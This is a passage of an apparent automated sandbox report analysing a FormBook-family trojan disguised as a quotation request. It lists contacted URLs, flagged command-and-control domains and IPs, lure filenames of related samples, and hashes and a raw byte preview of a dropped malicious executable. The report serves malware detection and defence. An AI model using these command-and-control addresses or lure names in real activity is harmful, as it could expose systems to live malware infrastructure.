                  https://hm.baidu.com/hm.js?RMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.hsck520.combXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4105348256.0000000004AC5000.00000040.80000000.00040000.00000000.sdmptrue
                  • 5%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.galapagosdesign.com/DPleasexl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsRMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fonts.comxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sandoll.co.krxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.urwpp.deDPleasexl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.zhongyicts.com.cnxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexl9lsbb.exe, 0000000B.00000002.3205108793.0000000002C39000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sakkal.comxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssRMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.livechatinc.com/tracking.jsfirefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhurunonce.exe, 0000000F.00000002.4105089427.0000000004FE4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4104953785.0000000003934000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.3934094880.00000000031D4000.00000004.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.comxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarkRMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoRMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.qmancha.combXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000002.4103523467.000000000159E000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.ecosia.org/newtab/RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.carterandcone.comlxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jsRMActivate_ssp.exe, 00000003.00000002.4108188489.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4106518555.000000000552A000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ac.ecosia.org/autocomplete?q=RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/cabarga.htmlNxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cnxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/frere-user.htmlxl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.jiyu-kobo.co.jp/xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers8xl9lsbb.exe, 0000000B.00000002.3209889166.0000000006F72000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.livechat.com/chat-with/14282961/RMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.livechat.com/?welcomeRMActivate_ssp.exe, 00000003.00000002.4106518555.00000000043E4000.00000004.10000000.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103678108.00000000029E4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2030768757.000000003DCC4000.00000004.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RMActivate_ssp.exe, 00000003.00000003.1927306906.000000000813E000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3830287320.0000000007618000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  202.95.21.152
                  		www.qmancha.comSingapore
                  		64050BCPL-SGBGPNETGlobalASNSGtrue
                  13.248.169.48
                  		www.webuyfontana.comUnited States
                  		16509AMAZON-02UStrue
                  35.190.52.58
                  		www.hsck520.comUnited States
                  		15169GOOGLEUSfalse
                  203.161.55.102
                  		www.lexiecos.topMalaysia
                  		45899VNPT-AS-VNVNPTCorpVNtrue
                  165.154.0.120
                  		7a4ca695fd164z.greycdn.netCanada
                  		7456INTERHOPCAtrue
                  185.234.72.101
                  		unknownUnited Kingdom
                  		30823COMBAHTONcombahtonGmbHDEfalse
                  162.241.253.174
                  		ndhockeyprospects.comUnited States
                  		46606UNIFIEDLAYER-AS-1UStrue
                  207.148.37.252
                  		aj.ajunsdfancsda.comHong Kong
                  		59371DNC-ASDimensionNetworkCommunicationLimitedHKtrue
                  38.47.232.224
                  		ytw6.topUnited States
                  		174COGENT-174UStrue
                  116.213.43.190
                  		www.binpvae.lolHong Kong
                  		63889CLOUDIVLIMITED-ASCloudIvLimitedHKtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1467353
                  Start date and time:2024-07-04 03:09:08 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 11m 39s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:4
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:RFQ - MK FMHS.RFQ.24.101.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@15/9@16/10
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 92%
                  • Number of executed functions: 61
                  • Number of non-executed functions: 267
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  21:10:42API Interceptor10666626x Sleep call for process: RMActivate_ssp.exe modified
                  21:12:31API Interceptor1x Sleep call for process: xl9lsbb.exe modified
                  21:13:52API Interceptor6x Sleep call for process: runonce.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  202.95.21.152Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                  • www.qmancha.com/3in6/
                  Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                  • www.qmancha.com/3in6/
                  AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                  • www.qmancha.com/3in6/
                  igcc.exeGet hashmaliciousFormBookBrowse
                  • www.qmancha.com/3in6/?x0=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&Ktq=EPAdvZ
                  erywhere.docGet hashmaliciousFormBookBrowse
                  • www.qmancha.com/3in6/
                  Aviso legal.xlsGet hashmaliciousFormBookBrowse
                  • www.qmancha.com/3in6/
                  13.248.169.48disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                  • www.realtors.biz/mc10/?FPWhWLW=jdcBaermB6yQx69Nuq2ME5QFoSRzZwy1xmQ8QxgmqU0bpq2JLrsUggC5m/bcjmEWnWMuFtbCmA==&AlB=8pdT8tsp
                  order_details_file.docGet hashmaliciousUnknownBrowse
                  • themaiergroup.com/8C4ebB7oC
                  2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                  • www.scarytube.world/ts59/?7n=5Kzuc08NHZ8t10osRye94ZQvODLPm8mJty646c/dpAg/zLZpW1bo0yg/pue6LIfdumZDuAZHWw==&2d8=3fe8kxnx8zVX-2L
                  scan19062024.exeGet hashmaliciousFormBookBrowse
                  • www.oreh.net/even/
                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                  • www.ansverity.com/7llb/
                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                  • www.ansverity.com/7llb/
                  Shipping Documents.pdf.exeGet hashmaliciousFormBookBrowse
                  • www.cetys.com/dxp3/
                  3gQmWdKNmxvFltF.exeGet hashmaliciousFormBookBrowse
                  • www.neorubik.com/wfa4/
                  DHL ARRIVAL DOCUMENTS.pdf.exeGet hashmaliciousFormBookBrowse
                  • www.powermove.top/rn94/?CP60e=Nj5TAPxx-d38Ipw0&SXm49b=MMl9Jq1Gixo29JRmkSbLCN6EVpIRAsEm95pHOadnX8YyThAqs1LLlEeR6IUiNg+18kA9edDpQA==
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.11461.28588.rtfGet hashmaliciousFormBookBrowse
                  • www.randyhicks.com/muti/?gbipcn=Y/q+Ka0BewSFAcVnUKRTYlqYb4N3K9mb9qiuw7dOZdquw2YOwDzrJ50GQHFOtlojwSqa5A==&7nR88f=DBWdPP1X60oxYj
                  203.161.55.102GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                  • www.lacemalt.top/tb8p/
                  Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exeGet hashmaliciousFormBookBrowse
                  • www.lexiecos.top/ff8d/
                  Materials specification with quantities.exeGet hashmaliciousFormBookBrowse
                  • www.lexiecos.top/ff8d/
                  Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                  • www.lexiecos.top/ff8d/
                  PTT request form.exeGet hashmaliciousFormBookBrowse
                  • www.bodfun.online/wbp0/
                  Request for Quotation - e092876.exeGet hashmaliciousFormBookBrowse
                  • www.lexiecos.top/ff8d/
                  PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                  • www.bodfun.online/wbp0/
                  RFQ - 5002172340000.exeGet hashmaliciousFormBookBrowse
                  • www.lexiecos.top/ff8d/
                  PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                  • www.timelesszone.xyz/bf2r/
                  Quotation - TB046J12LCO2 Project Mechanical.exeGet hashmaliciousFormBookBrowse
                  • www.lexiecos.top/ff8d/

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  www.binpvae.lolRequest for Quotation for PTTEP - EPCC for SISGES Development Project 2.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  Materials specification with quantities.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  RFQ - 5002172340000.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  Quotation - TB046J12LCO2 Project Mechanical.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  Sapura Engineering Sdn Bhd-RFQ.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  RFQ - 49780284109.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  ITHi-Tech Park Project.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  RFQ - ITHi-Tech Park Project.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  RFQ - 872219700.exeGet hashmaliciousFormBookBrowse
                  • 116.213.43.190
                  aj.ajunsdfancsda.comRequest for Quotation for PTTEP - EPCC for SISGES Development Project 2.exeGet hashmaliciousFormBookBrowse
                  • 45.126.181.243
                  Materials specification with quantities.exeGet hashmaliciousFormBookBrowse
                  • 147.92.36.232
                  Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                  • 147.92.38.243
                  PTT request form.exeGet hashmaliciousFormBookBrowse
                  • 45.126.181.243
                  PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                  • 118.107.56.40
                  RFQ - 5002172340000.exeGet hashmaliciousFormBookBrowse
                  • 45.126.181.243
                  Quotation - TB046J12LCO2 Project Mechanical.exeGet hashmaliciousFormBookBrowse
                  • 147.92.38.243
                  D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                  • 147.92.36.232
                  Sapura Engineering Sdn Bhd-RFQ.exeGet hashmaliciousFormBookBrowse
                  • 147.92.36.232
                  RFQ - 49780284109.exeGet hashmaliciousFormBookBrowse
                  • 147.92.36.233
                  www.lexiecos.topRequest for Quotation for PTTEP - EPCC for SISGES Development Project 2.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  Materials specification with quantities.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  RFQ - 5002172340000.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  Quotation - TB046J12LCO2 Project Mechanical.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  Sapura Engineering Sdn Bhd-RFQ.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  RFQ - 49780284109.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  ITHi-Tech Park Project.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  RFQ - ITHi-Tech Park Project.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102
                  RFQ - 872219700.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  INTERHOPCAHSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  Materials specification with quantities.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  Request for Quotation - e092876.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  RFQ - 5002172340000.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  Quotation - TB046J12LCO2 Project Mechanical.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  Sapura Engineering Sdn Bhd-RFQ.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  RFQ - 49780284109.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  ITHi-Tech Park Project.exeGet hashmaliciousFormBookBrowse
                  • 165.154.0.120
                  COMBAHTONcombahtonGmbHDEfisher man.exeGet hashmaliciousFormBookBrowse
                  • 185.234.72.101
                  file.exeGet hashmaliciousGuLoader, RemcosBrowse
                  • 194.59.30.244
                  MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                  • 185.234.72.101
                  Att00173994.exeGet hashmaliciousFormBookBrowse
                  • 185.234.72.101
                  https://zondahome.ncg.bioGet hashmaliciousHTMLPhisherBrowse
                  • 45.147.231.122
                  file.exeGet hashmaliciousSocks5SystemzBrowse
                  • 194.59.31.219
                  8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                  • 185.234.72.101
                  EFT 06282024, 013441 PM.htmlGet hashmaliciousUnknownBrowse
                  • 194.59.31.132
                  209.141.57.51-x86-2024-07-01T10_22_46.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 152.89.244.142
                  6RjPHp1yLG.exeGet hashmaliciousSocks5SystemzBrowse
                  • 194.59.31.219
                  AMAZON-02UShttps://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fwww.cognitoforms.com%2fPaulWareConstruction%2fPaulWareConstruction&umid=78a9b273-344a-4f1a-b7d2-24e7c118b2df&auth=3a5566c60b1f4d8525fa8ab109f94675a663eb25-b5b8ec923cecbd7e3e5907f0ebdd261fbc9f6201Get hashmaliciousHTMLPhisherBrowse
                  • 44.228.224.212
                  https://click.pstmrk.it/3s/frutilandia.com%2Ffaq%2F/gRC2/yGq2AQ/AQ/a2d2de19-7d91-4f73-a067-0dd3f808145b/1/-HKuJv7KgCGet hashmaliciousHTMLPhisherBrowse
                  • 13.32.99.97
                  https://reservation.exnetehovervs.com/apart/285z92aaza77zGet hashmaliciousUnknownBrowse
                  • 18.245.31.129
                  https://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
                  • 108.157.188.101
                  https://metamesklogni.webflow.io/Get hashmaliciousUnknownBrowse
                  • 18.245.218.90
                  http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.htmlGet hashmaliciousUnknownBrowse
                  • 13.227.219.120
                  https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
                  • 13.227.219.71
                  http://review-page-violation-issue-meta-center.vercel.app/Get hashmaliciousUnknownBrowse
                  • 76.76.21.22
                  http://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
                  • 13.227.219.120
                  http://mysterymint-s10.vercel.app/Get hashmaliciousUnknownBrowse
                  • 76.76.21.241
                  BCPL-SGBGPNETGlobalASNSGhOe2JrpIAE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 14.128.41.165
                  998_popxinv_Installer.exeGet hashmaliciousXWormBrowse
                  • 134.122.174.169
                  h8N9qpyRAPaiitu.exeGet hashmaliciousFormBookBrowse
                  • 14.128.41.167
                  sora.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 118.107.53.143
                  Request for Quotation - e092876.exeGet hashmaliciousFormBookBrowse
                  • 118.107.56.38
                  Dtjgu2gHw0.elfGet hashmaliciousMiraiBrowse
                  • 137.220.211.71
                  cEEsFMSdw8.elfGet hashmaliciousMiraiBrowse
                  • 118.107.53.144
                  PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                  • 118.107.56.40
                  GOoY5QBqvC.elfGet hashmaliciousMirai, MoobotBrowse
                  • 118.107.53.127
                  https://whastappg.top/Get hashmaliciousUnknownBrowse
                  • 216.224.126.59
                  VNPT-AS-VNVNPTCorpVNSecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeGet hashmaliciousFormBookBrowse
                  • 203.161.49.220
                  SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeGet hashmaliciousFormBookBrowse
                  • 203.161.49.220
                  Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                  • 203.161.41.207
                  CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
                  • 203.161.62.199
                  Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                  • 203.161.49.220
                  spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                  • 203.161.49.220
                  AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                  • 203.161.50.127
                  file.exeGet hashmaliciousFormBookBrowse
                  • 203.161.43.228
                  fisher man.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.124
                  GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                  • 203.161.55.102

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xl9lsbb.exe.log

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\xl9lsbb.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.34331486778365
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VT3g2PdlLRVpwBp[1].exe

                  Download File
                  Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):984064
                  Entropy (8bit):7.950714934497661
                  Encrypted:false
                  SSDEEP:24576:fU8Gw/b1JQTj374gt7R7J9xCL8+cnVOdsMrxtY:fTGGJQTj374WdJ9xCL8+cVyrvY
                  MD5:C2F2B08E34FC25D172F2C3FCAB1ACFEB
                  SHA1:FC049C6F2B1D2BE76D7DC1BA79BAE9800C647145
                  SHA-256:9929D074C5FD1959151C22D3575B398805D52E1922DAEECFABCE860F9DFC1DC2
                  SHA-512:A80601EBE5E8C80B50A2944BF45D842282E8186BA23CBD68ABBA09CFB9B61F18FD51A3DDDD2075F706DEE4695D1B4C5D4006049FA1ED32F43852696C523AB42B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:................0......f......2.... ........@.. .......................`............@....................................O........d...................@..........p............................................ ............... ..H............text...8.... ...................... ..`.rsrc....d.......d..................@..@.reloc.......@......................@..B........................H.......Xk...E......5....................................................0............}.....s....}......}.....(.......(......{.....o.....(C........,b..{....r...po......r...po......{....(J......(....o......{.....o......{....r...po.......}.....8U......}.....{....r)..po......r)..po.....(C.....{.....oX......(....o......{.....oZ...o......{.....o^......(....o......{.....o\......(....o......{.....o`......(....o......{.....ob......(....o......u...........,H..{.....o......{....r...po.

                  C:\Users\user\AppData\Local\Temp\1-673479

                  Download File
